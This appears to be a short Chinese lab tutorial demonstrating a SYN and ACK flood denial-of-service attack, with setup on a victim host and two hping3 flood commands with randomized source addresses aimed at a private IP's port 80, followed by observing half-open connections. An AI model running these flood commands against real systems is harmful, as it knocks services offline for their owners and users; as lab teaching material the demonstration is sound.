DDOS直接攻击系统资源

DDOS ------直接攻击系统资源

思路:

攻击机利用三次握手机制,产生大量半连接,挤占受害者系统资源,使其无法正常提供服务。

1、先体验下受害者的正常网速。在受害者主机上执行以下命令

(1)开启Apache。
systemctl start apache2

(2) 下载百度首页代码。发现近乎瞬间完成。
curl baidu.com

2、在攻击机上执行以下代码,发起syn flood和ack flood。

bash 复制代码
hping3  --flood  --rand-source  -S  -p 80 192.168.237.133
hping3  --flood  --rand-source  -A  -p 80 192.168.237.133

3、在受害机上观察

(1)输入netstat -ant,可以看到很多的半链接

(2)尝试再次请求百度首页代码。
curl baidu.com

发现系统资源被挤占,久久得不到回复。

相关推荐
田里的水稻19 分钟前
EP_XML\JSON配置文件和YAML
xml·运维·人工智能·机器人·自动驾驶·json
阿成学长_Cain1 小时前
Linux telinit 命令详解:运行级别切换|关机重启|系统维护一站式掌握
linux·运维·前端·网络
ccino .1 小时前
Hackerone-地址栏xss
网络安全·xss
QXWZ_IA1 小时前
油气储罐沉降监测用什么技术方案最好?千寻自动化监测+次声波泄漏方案
运维·科技·自动化·能源
数据知道2 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
qeen872 小时前
【Linux】指令补充与shell的简单介绍
linux·运维·服务器
txg6662 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
DLYSB_3 小时前
《从零开始搭建机房轻量化“声光告警”系统:基于 HTTP API 与 TTS 的运维实践》
运维·网络协议·http·报警灯
阿成学长_Cain3 小时前
Linux talk 命令详解:经典终端实时聊天工具,无需图形界面即可对话
linux·运维·前端
红信鸽3 小时前
2026 年 AI 钓鱼攻击现状与防御深度解析
网络安全